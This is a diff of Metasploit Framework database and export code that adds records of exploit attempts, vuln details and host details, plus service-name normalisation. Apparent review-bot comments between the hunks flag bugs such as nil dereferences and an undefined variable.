+++ b/lib/msf/core/auxiliary/report.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Msf
###
diff --git a/lib/msf/core/auxiliary/rservices.rb b/lib/msf/core/auxiliary/rservices.rb
index a065c9f0ef..25671464df 100644
--- a/lib/msf/core/auxiliary/rservices.rb
+++ b/lib/msf/core/auxiliary/rservices.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
##
# $Id$
##
diff --git a/lib/msf/core/auxiliary/scanner.rb b/lib/msf/core/auxiliary/scanner.rb
index b57377f450..c03fb093a3 100644
--- a/lib/msf/core/auxiliary/scanner.rb
+++ b/lib/msf/core/auxiliary/scanner.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Msf
###
diff --git a/lib/msf/core/auxiliary/timed.rb b/lib/msf/core/auxiliary/timed.rb
index 6555fb9a3d..936c48c280 100644
--- a/lib/msf/core/auxiliary/timed.rb
+++ b/lib/msf/core/auxiliary/timed.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Msf
###
diff --git a/lib/msf/core/auxiliary/wmapmodule.rb b/lib/msf/core/auxiliary/wmapmodule.rb
index 313a7ed31a..fe55d7747e 100644
--- a/lib/msf/core/auxiliary/wmapmodule.rb
+++ b/lib/msf/core/auxiliary/wmapmodule.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Msf
###
#
diff --git a/lib/msf/core/constants.rb b/lib/msf/core/constants.rb
index cd4961529f..679d644aea 100644
--- a/lib/msf/core/constants.rb
+++ b/lib/msf/core/constants.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
###
#
# This file contains constants that are referenced by the core
diff --git a/lib/msf/core/data_store.rb b/lib/msf/core/data_store.rb
index a6db37afcc..38b48c644e 100644
--- a/lib/msf/core/data_store.rb
+++ b/lib/msf/core/data_store.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Msf
###
diff --git a/lib/msf/core/db.rb b/lib/msf/core/db.rb
index 2f882703c9..081d6474d1 100644
--- a/lib/msf/core/db.rb
+++ b/lib/msf/core/db.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
# Check Rex::Parser.nokogiri_loaded for status of the Nokogiri parsers
require 'rex/parser/nmap_nokogiri'
require 'rex/parser/nexpose_simple_nokogiri'
@@ -687,17 +688,38 @@ class DBManager
# it's vulnerable to, so it isn't really useful to save it.
if opts[:session] and session.via_exploit and session.via_exploit != "exploit/multi/handler"
return unless host
- port = session.exploit_datastore["RPORT"]
- service = (port ? host.services.find_by_port(port) : nil)
+
mod = framework.modules.create(session.via_exploit)
vuln_info = {
:host => host.address,
- :name => session.via_exploit,
+ :name => mod.name,
:refs => mod.references,
:workspace => wspace,
- :exploited_at => Time.now.utc
+ :exploited_at => Time.now.utc,
+ :info => "Exploited by #{mod.fullname} to create Session #{s.id}"
}
- framework.db.report_vuln(vuln_info)
+
+ port = session.exploit_datastore["RPORT"]
+ service = (port ? host.services.find_by_port(port.to_i) : nil)
+
+ vuln_info[:service] = service if service
+
+ vuln = framework.db.report_vuln(vuln_info)
+
+ attempt_info = {
+ :timestamp => Time.now.utc,
+ :workspace => wspace,
+ :module => session.via_exploit,
+ :username => session.username,
+ :refs => mod.references,
+ :session_id => s.id,
+ :host => host,
+ :service => service,
+ :vuln => vuln
+ }
+
+ framework.db.report_exploit_success(attempt_info)
+
end
s
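Review bot: `mod` is dereferenced without a nil check on the new `:name => mod.name` and `:info => "Exploited by #{mod.fullname} ..."` lines, directly after `framework.modules.create(session.via_exploit)`. Elsewhere in this commit `update_all_module_details` treats a nil result from `create` as possible (`next if not obj`), so a session whose module can no longer be instantiated would raise NoMethodError here instead of being recorded. Wrapping the vuln and attempt reporting in `if mod ... end` keeps session reporting working in that case. The enclosing method starts and ends outside this hunk.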
@@ -788,6 +810,225 @@ class DBManager
}
end
+
+ def report_exploit_success(opts)
+ ::ActiveRecord::Base.connection_pool.with_connection {
+
+ wspace = opts.delete(:workspace) || workspace
+ mrefs = opts.delete(:refs) || return
+ host = opts.delete(:host)
+ port = opts.delete(:port)
+ prot = opts.delete(:proto)
+ svc = opts.delete(:service)
+ vuln = opts.delete(:vuln)
+
+ timestamp = opts.delete(:timestamp)
+ username = opts.delete(:username)
+ mname = opts.delete(:module)
+
+ # Look up or generate the host as appropriate
+ if not (host and host.kind_of? ::Mdm::Host)
+ if svc.kind_of? ::Mdm::Service
+ host = svc.host
+ else
+ host = report_host(:workspace => wspace, :address => host )
+ end
+ end
+
+ # Bail if we dont have a host object
+ return if not host
+
+ # Look up or generate the service as appropriate
+ if port and svc.nil?
+ svc = report_service(:workspace => wspace, :host => host, :port => port, :proto => prot ) if port
+ end
+
+ if not vuln
+ # Create a references map from the module list
+ ref_objs = ::Mdm::Ref.where(:name => mrefs.map { |ref|
+ if ref.respond_to?(:ctx_id) and ref.respond_to?(:ctx_val)
+ "#{ref.ctx_id}-#{ref.ctx_val}"
+ else
+ ref.to_s
+ end
+ })
+
+ # Try find a matching vulnerability
+ vuln = find_vuln_by_refs(ref_objs, host, svc)
+ end
+
+ # We have match, lets create a vuln_attempt record
+ if vuln
+ attempt_info = {
+ :vuln_id => vuln.id,
+ :attempted_at => timestamp || Time.now.utc,
+ :exploited => true,
+ :username => username || "unknown",
+ :module => mname
+ }
+
+ attempt_info[:session_id] = opts[:session_id] if opts[:session_id]
+ attempt_info[:loot_id] = opts[:loot_id] if opts[:loot_id]
+
+ vuln.vuln_attempts.create(attempt_info)
+
+ # Correct the vuln's associated service if necessary
+ if svc and vuln.service_id.nil?
+ vuln.service = svc
+ vuln.save
+ end
+ end
+
+ # Report an exploit attempt all the same
+ attempt_info = {
+ :attempted_at => timestamp || Time.now.utc,
+ :exploited => true,
+ :username => username || "unknown",
+ :module => mname
+ }
+
+ attempt_info[:vuln_id] = vuln.id if vuln
+ attempt_info[:session_id] = opts[:session_id] if opts[:session_id]
+ attempt_info[:loot_id] = opts[:loot_id] if opts[:loot_id]
+
+ if svc
+ attempt_info[:port] = svc.port
+ attempt_info[:proto] = svc.proto
+ end
+
+ if port and svc.nil?
+ attempt_info[:port] = port
+ attempt_info[:proto] = prot || "tcp"
+ end
+
+ host.exploit_attempts.create(attempt_info)
+ }
+ end
+
+ def report_exploit_failure(opts)
+
+ ::ActiveRecord::Base.connection_pool.with_connection {
+ wspace = opts.delete(:workspace) || workspace
+ mrefs = opts.delete(:refs) || return
+ host = opts.delete(:host)
+ port = opts.delete(:port)
+ prot = opts.delete(:proto)
+ svc = opts.delete(:service)
+ vuln = opts.delete(:vuln)
+
+ timestamp = opts.delete(:timestamp)
+ freason = opts.delete(:fail_reason)
+ fdetail = opts.delete(:fail_detail)
+ username = opts.delete(:username)
+ mname = opts.delete(:module)
+
+ # Look up the host as appropriate
+ if not (host and host.kind_of? ::Mdm::Host)
+ if svc.kind_of? ::Mdm::Service
+ host = svc.host
+ else
+ host = get_host( :workspace => wspace, :address => host )
+ end
+ end
+
+ # Bail if we dont have a host object
+ return if not host
+
+ # Look up the service as appropriate
+ if port and svc.nil?
+ prot ||= "tcp"
+ svc = get_service(wspace, host, prot, port) if port
+ end
+
+ if not vuln
+ # Create a references map from the module list
+ ref_objs = ::Mdm::Ref.where(:name => mrefs.map { |ref|
+ if ref.respond_to?(:ctx_id) and ref.respond_to?(:ctx_val)
+ "#{ref.ctx_id}-#{ref.ctx_val}"
+ else
+ ref.to_s
+ end
+ })
+
+ # Try find a matching vulnerability
+ vuln = find_vuln_by_refs(ref_objs, host, svc)
+ end
+
+ # Report a vuln_attempt if we found a match
+ if vuln
+ attempt_info = {
+ :attempted_at => timestamp || Time.now.utc,
+ :exploited => false,
+ :fail_reason => freason,
+ :fail_detail => fdetail,
+ :username => username || "unknown",
+ :module => mname
+ }
+
+ vuln.vuln_attempts.create(attempt_info)
+ end
+
+ # Report an exploit attempt all the same
+ attempt_info = {
+ :attempted_at => timestamp || Time.now.utc,
+ :exploited => false,
+ :username => username || "unknown",
+ :module => mname,
+ :fail_reason => freason,
+ :fail_detail => fdetail
+ }
+
+ attempt_info[:vuln_id] = vuln.id if vuln
+
+ if svc
+ attempt_info[:port] = svc.port
+ attempt_info[:proto] = svc.proto
+ end
+
+ if port and svc.nil?
+ attempt_info[:port] = port
+ attempt_info[:proto] = prot || "tcp"
+ end
+
+ host.exploit_attempts.create(attempt_info)
+ }
+ end
+
+
+ def report_vuln_attempt(vuln, opts)
+ ::ActiveRecord::Base.connection_pool.with_connection {
+ return if not vuln
+ info = {}
+
+ # Opts can be keyed by strings or symbols
+ ::Mdm::VulnAttempt.column_names.each do |kn|
+ k = kn.to_sym
+ next if ['id', 'vuln_id'].include?(kn)
+ info[k] = opts[kn] if opts[kn]
+ info[k] = opts[k] if opts[k]
+ end
+
+ vuln.vuln_attempts.create(info)
+ }
+ end
+
+ def report_exploit_attempt(host, opts)
+ ::ActiveRecord::Base.connection_pool.with_connection {
+ return if not host
+ info = {}
+
+ # Opts can be keyed by strings or symbols
+ ::Mdm::VulnAttempt.column_names.each do |kn|
+ k = kn.to_sym
+ next if ['id', 'host_id'].include?(kn)
+ info[k] = opts[kn] if opts[kn]
+ info[k] = opts[k] if opts[k]
+ end
+
+ host.exploit_attempts.create(info)
+ }
+ end
+
def get_client(opts)
::ActiveRecord::Base.connection_pool.with_connection {
wspace = opts.delete(:workspace) || workspace
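Review bot: `report_exploit_attempt` filters `opts` against `::Mdm::VulnAttempt.column_names` but then creates the record through `host.exploit_attempts`, which looks like a copy of `report_vuln_attempt`. Any column that exists only on the exploit-attempt table would be dropped on import; `report_exploit_success` writes `:port` and `:proto` there. The `'host_id'` entry in the skip list also only makes sense for that table. The loop should read the columns of the model behind `host.exploit_attempts`, presumably `::Mdm::ExploitAttempt.column_names.each do |kn|`. Separately, none of the four new methods has the `return if not active` guard that `report_vuln` uses.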
@@ -1281,11 +1522,12 @@ class DBManager
#
# opts MUST contain
# +:host+:: the host where this vulnerability resides
- # +:name+:: the scanner-specific id of the vuln (e.g. NEXPOSE-cifs-acct-password-never-expires)
+ # +:name+:: the friendly name for this vulnerability (title)
#
# opts can contain
- # +:info+:: a human readable description of the vuln, free-form text
- # +:refs+:: an array of Ref objects or string names of references
+ # +:info+:: a human readable description of the vuln, free-form text
+ # +:refs+:: an array of Ref objects or string names of references
+ # +:details:: a hash with :key pointed to a find criteria hash and the rest containing VulnDetail fields
#
def report_vuln(opts)
return if not active
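Review bot: The new `+:details::` line is missing the closing `+` of the RDoc label, so it should read `# +:details+:: ...` to render like the other entries. The comment also leaves out options that `report_vuln` starts reading in this commit: `:service`, `:details_match` and `:ref_ids`. For `:ref_ids` it is worth stating that the values must be Ref records rather than integer ids, since they are passed to `find_vuln_by_refs` (which calls `.id` on each) and appended to `vuln.refs`. The body of `report_vuln` continues outside this hunk.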
@@ -1298,10 +1540,11 @@ class DBManager
wspace = opts.delete(:workspace) || workspace
exploited_at = opts[:exploited_at] || opts["exploited_at"]
- rids = nil
+ details = opts.delete(:details)
+ rids = opts.delete(:ref_ids)
if opts[:refs]
- rids = []
+ rids ||= []
opts[:refs].each do |r|
if (r.respond_to?(:ctx_id)) and (r.respond_to?(:ctx_val))
r = "#{r.ctx_id}-#{r.ctx_val}"
@@ -1321,16 +1564,6 @@ class DBManager
ret = {}
-=begin
- if host
- host.updated_at = host.created_at
- host.state = HostState::Alive
- host.save!
- else
- host = get_host(:workspace => wspace, :address => addr)
- end
-=end
-
# Truncate the info field at the maximum field length
if info
info = info[0,65535]
@@ -1339,41 +1572,152 @@ class DBManager
# Truncate the name field at the maximum field length
name = name[0,255]
- if info and name !~ /^NEXPOSE-/
- vuln = host.vulns.find_or_initialize_by_name_and_info(name, info)
+ # Placeholder for the vuln object
+ vuln = nil
+
+ # Identify the associated service
+ service = opts.delete(:service)
+
+ # Treat port zero as no service
+ if service or opts[:port].to_i > 0
+
+ if not service
+ proto = nil
+ case opts[:proto].to_s.downcase # Catch incorrect usages, as in report_note
+ when 'tcp','udp'
+ proto = opts[:proto]
+ when 'dns','snmp','dhcp'
+ proto = 'udp'
+ sname = opts[:proto]
+ else
+ proto = 'tcp'
+ sname = opts[:proto]
+ end
+
+ service = host.services.find_or_create_by_port_and_proto(opts[:port].to_i, proto)
+ end
+
+ # Try to find an existing vulnerability with the same service & references
+ # If there are multiple matches, choose the one with the most matches
+ # If a match is found on a vulnerability with no associated service,
+ # update that vulnerability with our service information. This helps
+ # prevent dupes of the same vuln found by both local patch and
+ # service detection.
+ if rids and rids.length > 0
+ vuln = find_vuln_by_refs(rids, host, service)
+ vuln.service = service if vuln
+ end
else
- vuln = host.vulns.find_or_initialize_by_name(name)
+ # Try to find an existing vulnerability with the same host & references
+ # If there are multiple matches, choose the one with the most matches
+ if rids and rids.length > 0
+ vuln = find_vuln_by_refs(rids, host)
+ end
end
- vuln.info = info.to_s if info
+ # Try to match based on vuln_details records
+ if not vuln and opts[:details_match]
+ vuln = find_vuln_by_details(opts[:details_match], host, service)
+ if vuln and service and not vuln.service
+ vuln.service = service
+ end
+ end
+
+ # No matches, so create a new vuln record
+ unless vuln
+ if service
+ vuln = service.vulns.find_by_name(name)
+ else
+ vuln = host.vulns.find_by_name(name)
+ end
+
+ unless vuln
+
+ vinf = {
+ :host_id => host.id,
+ :name => name,
+ :info => info
+ }
+
+ vinf[:service_id] = service.id if service
+ vuln = Mdm::Vuln.create(vinf)
+ end
+ end
+
+ # Set the exploited_at value if provided
vuln.exploited_at = exploited_at if exploited_at
- if opts[:port]
- proto = nil
- case opts[:proto].to_s.downcase # Catch incorrect usages, as in report_note
- when 'tcp','udp'
- proto = opts[:proto]
- when 'dns','snmp','dhcp'
- proto = 'udp'
- sname = opts[:proto]
- else
- proto = 'tcp'
- sname = opts[:proto]
- end
- vuln.service = host.services.find_or_create_by_port_and_proto(opts[:port], proto)
- end
-
+ # Merge the references
if rids
vuln.refs << (rids - vuln.refs)
end
+ # Finalize
if vuln.changed?
msf_import_timestamps(opts,vuln)
vuln.save!
end
+
+ # Handle vuln_details parameters
+ report_vuln_details(vuln, details) if details
+
+ vuln
}
end
+ def find_vuln_by_refs(refs, host, service=nil)
+
+ vuln = nil
+
+ # Try to find an existing vulnerability with the same service & references
+ # If there are multiple matches, choose the one with the most matches
+ if service
+ refs_ids = refs.map{|x| x.id }
+ vuln = service.vulns.find(:all, :include => [:refs], :conditions => { 'refs.id' => refs_ids }).sort { |a,b|
+ ( refs_ids - a.refs.map{|x| x.id } ).length <=> ( refs_ids - b.refs.map{|x| x.id } ).length
+ }.first
+ end
+
+ # Return if we matched based on service
+ return vuln if vuln
+
+ # Try to find an existing vulnerability with the same host & references
+ # If there are multiple matches, choose the one with the most matches
+ refs_ids = refs.map{|x| x.id }
+ vuln = host.vulns.find(:all, :include => [:refs], :conditions => { 'service_id' => nil, 'refs.id' => refs_ids }).sort { |a,b|
+ ( refs_ids - a.refs.map{|x| x.id } ).length <=> ( refs_ids - b.refs.map{|x| x.id } ).length
+ }.first
+
+ return vuln
+ end
+
+
+ def find_vuln_by_details(details_map, host, service=nil)
+
+ # Create a modified version of the criteria in order to match against
+ # the joined version of the fields
+
+ crit = {}
+ details_map.each_pair do |k,v|
+ crit[ "vuln_details.#{k}" ] = v
+ end
+
+ vuln = nil
+
+ if service
+ vuln = service.vulns.find(:first, :include => [:vuln_details], :conditions => crit)
+ end
+
+ # Return if we matched based on service
+ return vuln if vuln
+
+ # Prevent matches against other services
+ crit["vulns.service_id"] = nil if service
+ vuln = host.vulns.find(:first, :include => [:vuln_details], :conditions => crit)
+
+ return vuln
+ end
+
def get_vuln(wspace, host, service, name, data='')
raise RuntimeError, "Not workspace safe: #{caller.inspect}"
::ActiveRecord::Base.connection_pool.with_connection {
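Review bot: The `:info` value is now stored only when a vuln is created (`vinf[:info]` passed to `Mdm::Vuln.create`), because the removed `vuln.info = info.to_s if info` has no replacement on the path where an existing record is matched by refs, details or name. The session hook in this same commit passes `:info => "Exploited by ..."`, and that text is silently discarded whenever the vuln already exists. If keeping the original description is intended, a comment saying so would help. Otherwise restore `vuln.info = info.to_s if info` before the `vuln.changed?` check. `report_vuln` begins outside this hunk; the local `sname` is still assigned and never used.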
@@ -1411,6 +1755,54 @@ class DBManager
}
end
+ #
+ # Populate the vuln_details table with additional
+ # information, matched by a specific criteria
+ #
+ def report_vuln_details(vuln, details)
+ ::ActiveRecord::Base.connection_pool.with_connection {
+ detail = ::Mdm::VulnDetail.where(( details.delete(:key) || {} ).merge(:vuln_id => vuln.id)).first
+ if detail
+ details.each_pair do |k,v|
+ detail[k] = v
+ end
+ detail.save! if detail.changed?
+ detail
+ else
+ detail = ::Mdm::VulnDetail.create(details.merge(:vuln_id => vuln.id))
+ end
+ }
+ end
+
+ #
+ # Update vuln_details records en-masse based on specific criteria
+ # Note that this *can* update data across workspaces
+ #
+ def update_vuln_details(details)
+ criteria = details.delete(:key) || {}
+ ::Mdm::VulnDetail.update(key, details)
+ end
+
+ #
+ # Populate the host_details table with additional
+ # information, matched by a specific criteria
+ #
+ def report_host_details(host, details)
+ ::ActiveRecord::Base.connection_pool.with_connection {
+
+ detail = ::Mdm::HostDetail.where(( details.delete(:key) || {} ).merge(:host_id => host.id)).first
+ if detail
+ details.each_pair do |k,v|
+ detail[k] = v
+ end
+ detail.save! if detail.changed?
+ detail
+ else
+ detail = ::Mdm::HostDetail.create(details.merge(:host_id => host.id))
+ end
+ }
+ end
+
# report_exploit() used to be used to track sessions and which modules
# opened them. That information is now available with the session table
# directly. TODO: kill this completely some day -- for now just warn if
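Review bot: `update_vuln_details` stores the criteria in `criteria` but then calls `::Mdm::VulnDetail.update(key, details)`, and no `key` is defined in the method, so any call should raise NameError. ActiveRecord's class-level `update` also expects record ids as its first argument rather than a conditions hash, so the likely intent is `::Mdm::VulnDetail.where(criteria).update_all(details)`. Because an empty criteria hash would then touch every row in every workspace, a guard such as `return if criteria.empty?` is worth adding. Unlike its siblings, this method does not run inside `connection_pool.with_connection`.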
@@ -3305,6 +3697,29 @@ class DBManager
}
host_address = host_data[:host].dup # Preserve after report_host() deletes
hobj = report_host(host_data)
+
+ host.elements.each("host_details") do |hdet|
+ hdet_data = {}
+ hdet.elements.each do |det|
+ next if ["id", "host-id"].include?(det.name)
+ if det.text
+ hdet_data[det.name.gsub('-','_')] = nils_for_nulls(det.text.to_s.strip)
+ end
+ end
+ report_host_details(hobj, hdet_data)
+ end
+
+ host.elements.each("exploit_attempts") do |hdet|
+ hdet_data = {}
+ hdet.elements.each do |det|
+ next if ["id", "host-id", "session-id", "vuln-id", "service-id", "loot-id"].include?(det.name)
+ if det.text
+ hdet_data[det.name.gsub('-','_')] = nils_for_nulls(det.text.to_s.strip)
+ end
+ end
+ report_exploit_attempt(hobj, hdet_data)
+ end
+
host.elements.each('services/service') do |service|
service_data = {}
service_data[:workspace] = wspace
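Review bot: In the `host_details` loop, element names from the imported file become attribute keys (`hdet_data[det.name.gsub('-','_')]`) and go straight to `report_host_details`, which assigns them with `detail[k] = v` or `HostDetail.create`. Only `id` and `host-id` are skipped, so an unexpected element in a hand-edited or foreign export can set columns such as timestamps or abort the import on an unknown attribute. Filtering against the model's columns, as `report_vuln_attempt` does, would bound this: `next unless ::Mdm::HostDetail.column_names.include?(det.name.gsub('-','_'))`. The `vuln_details` loop added in the later `vulns/vuln` hunk has the same gap. `report_host_details` also calls `host.id` with no guard, so a nil `hobj` from `report_host` would raise.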
@@ -3322,6 +3737,7 @@ class DBManager
}
report_service(service_data)
end
+
host.elements.each('notes/note') do |note|
note_data = {}
note_data[:workspace] = wspace
@@ -3342,6 +3758,7 @@ class DBManager
}
report_note(note_data)
end
+
host.elements.each('tags/tag') do |tag|
tag_data = {}
tag_data[:addr] = host_address
@@ -3359,6 +3776,7 @@ class DBManager
end
report_host_tag(tag_data)
end
+
host.elements.each('vulns/vuln') do |vuln|
vuln_data = {}
vuln_data[:workspace] = wspace
@@ -3376,8 +3794,32 @@ class DBManager
vuln_data[:refs] << nils_for_nulls(ref.text.to_s.strip)
end
end
- report_vuln(vuln_data)
+
+ vobj = report_vuln(vuln_data)
+
+ vuln.elements.each("vuln_details") do |vdet|
+ vdet_data = {}
+ vdet.elements.each do |det|
+ next if ["id", "vuln-id"].include?(det.name)
+ if det.text
+ vdet_data[det.name.gsub('-','_')] = nils_for_nulls(det.text.to_s.strip)
+ end
+ end
+ report_vuln_details(vobj, vdet_data)
+ end
+
+ vuln.elements.each("vuln_attempts") do |vdet|
+ vdet_data = {}
+ vdet.elements.each do |det|
+ next if ["id", "vuln-id", "loot-id", "session-id"].include?(det.name)
+ if det.text
+ vdet_data[det.name.gsub('-','_')] = nils_for_nulls(det.text.to_s.strip)
+ end
+ end
+ report_vuln_attempt(vobj, vdet_data)
+ end
end
+
host.elements.each('creds/cred') do |cred|
cred_data = {}
cred_data[:workspace] = wspace
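Review bot: `vobj` is used without a nil check in `report_vuln_details(vobj, vdet_data)`, although `report_vuln` can return nil (it opens with `return if not active`). `report_vuln_details` calls `vuln.id` immediately, whereas `report_vuln_attempt` guards with `return if not vuln`. Adding `next unless vobj` right after `vobj = report_vuln(vuln_data)` skips both nested loops safely. The enclosing import method starts outside this hunk.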
@@ -4614,26 +5056,50 @@ class DBManager
REXML::Document.parse_stream(data, parser)
end
- # This is starting to be more than just nmap -> msf, other
- # things are creeping in here. Consider renaming the method
- # and intentionally making it more general.
def nmap_msf_service_map(proto)
+ service_name_map(proto)
+ end
+
+ #
+ # This method normalizes an incoming service name to one of the
+ # the standard ones recognized by metasploit
+ #
+ def service_name_map(proto)
return proto unless proto.kind_of? String
case proto.downcase
- when "msrpc", "nfs-or-iis"; "dcerpc"
- when "netbios-ns"; "netbios"
- when "netbios-ssn", "microsoft-ds"; "smb"
- when "ms-sql-s"; "mssql"
- when "ms-sql-m"; "mssql-m"
+ when "msrpc", "nfs-or-iis", "dce endpoint resolution"
+ "dcerpc"
+ when "ms-sql-s", "tds"
+ "mssql"
+ when "ms-sql-m","microsoft sql monitor"
+ "mssql-m"
when "postgresql"; "postgres"
when "http-proxy"; "http"
when "iiimsf"; "db2"
when "oracle-tns"; "oracle"
when "quickbooksrds"; "metasploit"
+ when "microsoft remote display protocol"
+ "rdp"
+ when "vmware authentication daemon"
+ "vmauthd"
+ when "netbios-ns", "cifs name service"
+ "netbios"
+ when "netbios-ssn", "microsoft-ds", "cifs"
+ "smb"
+ when "remote shell"
+ "shell"
+ when "remote login"
+ "login"
+ when "nfs lockd"
+ "lockd"
+ when "hp jetdirect"
+ "jetdirect"
+ when "dhcp server"
+ "dhcp"
when /^dns-(udp|tcp)$/; "dns"
when /^dce[\s+]rpc$/; "dcerpc"
else
- proto.downcase
+ proto.downcase.gsub(/\s*\(.*/, '') # "service (some service)"
end
end
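Review bot: The parenthetical suffix is stripped only in the `else` branch (`proto.downcase.gsub(/\s*\(.*/, '')`), so a name such as "microsoft-ds (something)" never reaches the `when "netbios-ssn", "microsoft-ds", "cifs"` arm and comes back as "microsoft-ds" instead of "smb". Normalising once before matching fixes that: `case proto.downcase.gsub(/\s*\(.*/, '')`, with the `else` arm returning the same normalised value. The new doc comment also contains a doubled word, "one of the the standard ones".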
diff --git a/lib/msf/core/db_export.rb b/lib/msf/core/db_export.rb
index c83e932cfa..df305d32a9 100644
--- a/lib/msf/core/db_export.rb
+++ b/lib/msf/core/db_export.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Msf
##
@@ -255,6 +256,13 @@ class Export
extract_web_vuln_info(report_file)
report_file.write %Q|\n|
+ yield(:status, "start", "module details") if block_given?
+ report_file.write %Q|\n|
+ report_file.flush
+ extract_module_detail_info(report_file)
+ report_file.write %Q|\n|
+
+
report_file.write %Q|\n|
report_file.flush
report_file.close
@@ -350,6 +358,96 @@ class Export
return el
end
+
+ def extract_module_detail_info(report_file)
+ Mdm::ModuleDetail.all.each do |m|
+ report_file.write("\n")
+ m_id = m.attributes["id"]
+
+ # Module attributes
+ m.attributes.each_pair do |k,v|
+ el = create_xml_element(k,v)
+ report_file.write(" #{el}\n") # Not checking types
+ end
+
+ # Authors sub-elements
+ report_file.write(" \n")
+ m.authors.find(:all).each do |d|
+ d.attributes.each_pair do |k,v|
+ el = create_xml_element(k,v)
+ report_file.write(" #{el}\n")
+ end
+ end
+ report_file.write(" \n")
+
+ # Refs sub-elements
+ report_file.write(" \n")
+ m.refs.find(:all).each do |d|
+ d.attributes.each_pair do |k,v|
+ el = create_xml_element(k,v)
+ report_file.write(" #{el}\n")
+ end
+ end
+ report_file.write(" \n")
+
+
+ # Archs sub-elements
+ report_file.write(" \n")
+ m.archs.find(:all).each do |d|
+ d.attributes.each_pair do |k,v|
+ el = create_xml_element(k,v)
+ report_file.write(" #{el}\n")
+ end
+ end
+ report_file.write(" \n")
+
+
+ # Platforms sub-elements
+ report_file.write(" \n")
+ m.platforms.find(:all).each do |d|
+ d.attributes.each_pair do |k,v|
+ el = create_xml_element(k,v)
+ report_file.write(" #{el}\n")
+ end
+ end
+ report_file.write(" \n")
+
+
+ # Targets sub-elements
+ report_file.write(" \n")
+ m.targets.find(:all).each do |d|
+ d.attributes.each_pair do |k,v|
+ el = create_xml_element(k,v)
+ report_file.write(" #{el}\n")
+ end
+ end
+ report_file.write(" \n")
+
+ # Actions sub-elements
+ report_file.write(" \n")
+ m.actions.find(:all).each do |d|
+ d.attributes.each_pair do |k,v|
+ el = create_xml_element(k,v)
+ report_file.write(" #{el}\n")
+ end
+ end
+ report_file.write(" \n")
+
+ # Mixins sub-elements
+ report_file.write(" \n")
+ m.mixins.find(:all).each do |d|
+ d.attributes.each_pair do |k,v|
+ el = create_xml_element(k,v)
+ report_file.write(" #{el}\n")
+ end
+ end
+ report_file.write(" \n")
+
+ report_file.write("\n")
+ end
+ report_file.flush
+ end
+
# ActiveRecord's to_xml is easy and wrong. This isn't, on both counts.
def extract_host_info(report_file)
@hosts.each do |h|
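Review bot: `extract_module_detail_info` repeats the same find, `attributes.each_pair` and write loop seven times, differing only in the association (`authors`, `refs`, `archs`, `platforms`, `targets`, `actions`, `mixins`). A small private helper taking the association and its wrapper tag would cut the method to a few lines and keep the sections consistent. `Mdm::ModuleDetail.all.each` also loads every row at once; `Mdm::ModuleDetail.find_each do |m|`, which `update_all_module_details` in this commit already uses, streams in batches. The local `m_id` is assigned and never read.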
@@ -362,6 +460,26 @@ class Export
report_file.write(" #{el}\n") # Not checking types
end
+ # Host details sub-elements
+ report_file.write(" \n")
+ h.host_details.find(:all).each do |d|
+ d.attributes.each_pair do |k,v|
+ el = create_xml_element(k,v)
+ report_file.write(" #{el}\n")
+ end
+ end
+ report_file.write(" \n")
+
+ # Host exploit attempts sub-elements
+ report_file.write(" \n")
+ h.exploit_attempts.find(:all).each do |d|
+ d.attributes.each_pair do |k,v|
+ el = create_xml_element(k,v)
+ report_file.write(" #{el}\n")
+ end
+ end
+ report_file.write(" \n")
+
# Service sub-elements
report_file.write(" \n")
@services.find_all_by_host_id(host_id).each do |e|
@@ -394,6 +512,37 @@ class Export
el = create_xml_element(k,v)
report_file.write(" #{el}\n")
end
+
+ # References
+ report_file.write(" \n")
+ e.refs.each do |ref|
+ el = create_xml_element("ref",ref.name)
+ report_file.write(" #{el}\n")
+ end
+ report_file.write(" \n")
+
+
+ # Vuln details sub-elements
+ report_file.write(" \n")
+ e.vuln_details.find(:all).each do |d|
+ d.attributes.each_pair do |k,v|
+ el = create_xml_element(k,v)
+ report_file.write(" #{el}\n")
+ end
+ end
+ report_file.write(" \n")
+
+
+ # Vuln attempts sub-elements
+ report_file.write(" \n")
+ e.vuln_attempts.find(:all).each do |d|
+ d.attributes.each_pair do |k,v|
+ el = create_xml_element(k,v)
+ report_file.write(" #{el}\n")
+ end
+ end
+ report_file.write(" \n")
+
report_file.write(" \n")
end
report_file.write(" \n")
diff --git a/lib/msf/core/db_manager.rb b/lib/msf/core/db_manager.rb
index ff6cde05c0..40cab43b89 100644
--- a/lib/msf/core/db_manager.rb
+++ b/lib/msf/core/db_manager.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require "active_record"
require 'msf/core'
@@ -315,6 +316,181 @@ class DBManager
framework.db.find_workspace(@workspace_name)
end
+ def update_all_module_details
+ return if not self.migrated
+
+ ::ActiveRecord::Base.connection_pool.with_connection {
+
+ refresh = []
+ skipped = []
+
+ Mdm::ModuleDetail.find_each do |md|
+
+ unless md.ready
+ refresh << md
+ next
+ end
+
+ unless md.file and ::File.exists?(md.file)
+ refresh << md
+ next
+ end
+
+ if ::File.mtime(md.file).to_i != md.mtime.to_i
+ refresh << md
+ next
+ end
+
+ skipped << [md.mtype, md.refname]
+ end
+
+ refresh.each {|md| md.destroy }
+ refresh = nil
+
+ stime = Time.now.to_f
+ [
+ [ 'exploit', framework.exploits ],
+ [ 'auxiliary', framework.auxiliary ],
+ [ 'post', framework.post ],
+ [ 'payload', framework.payloads ],
+ [ 'encoder', framework.encoders ],
+ [ 'nop', framework.nops ]
+ ].each do |mt|
+ mt[1].keys.sort.each do |mn|
+ next if skipped.include?( [ mt[0], mn ] )
+ obj = mt[1].create(mn)
+ next if not obj
+ update_module_details(obj)
+ end
+ end
+
+ nil
+
+ }
+ end
+
+ def update_module_details(obj)
+ return if not self.migrated
+
+ ::ActiveRecord::Base.connection_pool.with_connection {
+ info = module_to_details_hash(obj)
+ bits = info.delete(:bits) || []
+
+ md = Mdm::ModuleDetail.create(info)
+ bits.each do |args|
+ otype, vals = args
+ case otype
+ when :author
+ md.add_author(vals[:name], vals[:email])
+ when :action
+ md.add_action(vals[:name])
+ when :arch
+ md.add_arch(vals[:name])
+ when :platform
+ md.add_platform(vals[:name])
+ when :target
+ md.add_target(vals[:index], vals[:name])
+ when :ref
